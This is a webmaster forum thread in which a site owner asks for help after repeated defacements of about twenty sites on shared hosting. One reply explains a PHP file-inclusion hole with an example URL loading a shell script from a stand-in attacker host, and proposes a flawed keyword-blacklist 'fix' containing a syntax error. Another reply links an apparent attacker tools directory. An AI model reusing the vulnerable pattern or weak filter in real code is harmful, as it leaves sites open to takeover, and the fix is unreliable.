Hacked! Need help ASAP.

Status
Not open for further replies.
MyOwnDemon

MyOwnDemon

Face Rocker
Jan 28, 2007
3,529
27
48
Iowa
www.sitestomp.com
Hey guys,

Some fuckers keep hacking my server over and over again. I don't even how they're getting in or what I'm looking for. They keep replacing all my index files with their own index file which displays a "Hacked By" page. They apparently got root access somehow, because they're going one by one and messing up about 20 sites in total.

I reupload everything, and thought it was fixed, deleted the SQL DB I thought was affected - but they just got in again.

If anyone can help me get this straightened out, please send me a PM or contact me on AIM. My screen name is Nokotone and I'm online right now.

Any help would be much appreciated. I'll give you the affected URLs and FTP access in if you need it.

Thanks much in advance for anyone who can help me out!

Edit: I already tried calling my host and got no help at all.
 


Well my first question is (and most obvious), have you changed your root password yet? If not, do it NOW.
 
do you use any scripts or cms's like wordpress etc. are you on shared server?
 
You should check for any new software that may have been uploaded to the root. There may be a rootkit or some sort of backdoor that was installed.
 
Mason: It is on a shared server. I use Wordpress, a few custom CMS I have had developed, and a few scripts that I bought. They could have exploited any of that. I deleted the entire site that I *think* they got access through (an arcade script), as well as the SQL DB attached to it.

frcreature: I didn't see any new folders or files when I was checking, but that doesn't mean they're no there. How do I check for that? I know little to nothing about technical stuff.

I also normally don't put my sites out there, but demontales [dot] com is one example of a site they got to. You can see their "hacked by" page there.
 
You might have gotten hacked with the same technique that happen to me a few years ago. My site structure was this:

site.com/index.php?page=blah.html

index.php was my template and would include blah.html inside the template using:
<? include($_GET['page']);?>
Click to expand...
Turns out this is really insecure and they can include something like this:

http://site.com/index.php?page=http://hackersite.com/shellscript.exe

They basically ran a linux command console on my server, allowing them to do pretty much anything.

I fixed it with this:
if (eregi("http", $page) || eregi("ftp", $page) || eregi("../", $page)) {
$page = "security.php" //log ip, send email
}
include($page);
Click to expand...
 
I was hacked into awhile back and kept having problems until I changed hosting companies. Recently I had a prob w/WP, but I upgraded and I'm OK now.

I was only making pennies a day back then and it really discouraged me. It sure slowed down the little progress I was making at the time. I didn't feel like working on any of it for awhile because I kept loosing all my work.

The best to you and I hope it is resolved soon.
 
Bubbles - Yeah, thanks for the fix. :) First I have to figure out what site they got access through. There are a bunch of them on this hosting package. Got someone looking through the logs now.

Jan- Yeah, it's more than a few pennies. ;) Out of all the sites they could have picked to mess up, they got my moneymaker. Very frustrating.

Thanks for all the help so far, guys.
 
first things first check your logs including ftp logs and try to get some info on them.
Then turn off your ftp service to see if thats who they're getting in. if the files are still getting changed check your cpanel access. and so on. That'll help you figure out how they're getting root. Just kinda start narrowing it down and fix the problem.
 
You say it is shared hosting? So this is not your server right? So the host changed the root password of the server - not you? If they are affecting all hosts on this shared server it is not just you that is at fault, it could be ANY one thing on all of these other sites. Not much you can do... it is up to your ISP to fix this. Anything you do will be futile, your site is just sitting in a directory on a server and they are probably just find and replacing all index files with their own 'hacke dby' page using a script.
 
For anyone who wants to protect themselves he is being hacked by the following group and here are some links for there methods lol.

This is the site where the hackers are coming from or at least its one they own http://h4all.by.ru/ or maybe they just use it

Here are some files for that site http://h4all.by.ru/tools/SitEs/

The tricky thing is that they upload a new index.php file directly to your FTP account so its not a SQL type of injection.

I believe they are doing 1 of 2 things, 1 they are phishing for passwords or 2 they are finding and exploit in an upload tool on the site.

Or they may have even found an exploit in the hosting providers account like what happend with DreamHost when they lost 3600 passwords.

I'm looking more into it but this particular group has been busy check out the google link for them

Google

I have there index.php file which contains a decent song and a load of JavaScript, I'm going to rip my way through it and see if there are any clues to there methods.
 
  • Like
Reactions: MyOwnDemon
Thank for all the help Aequitas! You rock dude. It's back up and running for now, I'll have to wait and see if they hit it again. I'm guessing they will since they've already hit me twice now... I'll get a hold of you on AIM tommorow.

And thanks to everyone else who IMed/PMed me. You guys are awesome. :)

And for the record, my host is 1and1. And wow, their customer support was absolutely ridiculous. The guy could barely speak english and when I asked him to transfer me to the abuse department, he said he couldn't. I just hung up. I wonder if the whole shared server got hit by these hackers.
 
Looks like they're based in Russia. We may need to book some tickets and kick some ass personally - Skull kid style. Unfortunately the only russian phrases I can speak are "How are you", "My name is..." and "Thank You".
 
Those crazy russians are pretty smart sometimes I tell you, just like the whole NASA catastraphy a few years back.

I'll tell you about it if you don't remember.

Apparently NASA spent 1 Million to create a pen that would write in space because normal ones won't work in low gravity and all, anyway after all the news releases someone asked the Russians how they solved the problem and they said its simple we use a pencil.
 
Aequitas said:
Apparently NASA spent 1 Million to create a pen that would write in space because normal ones won't work in low gravity and all, anyway after all the news releases someone asked the Russians how they solved the problem and they said its simple we use a pencil.
Click to expand...
Not exactly, apparently that story is a myth and the Americans already knew they could use a pencil, but wanted to use pens in space.
 
I changed all my PWs, and then these fuckers just wiped out my shit again and replaced all my index files so I don't think they're getting in via FTP. This shit is getting so fucking annoying. My host, of course, is not helping me at all. As soon as I fix this, my next goal is moving all my sites to a different host.
 
Status
Not open for further replies.
Top Bottom
Back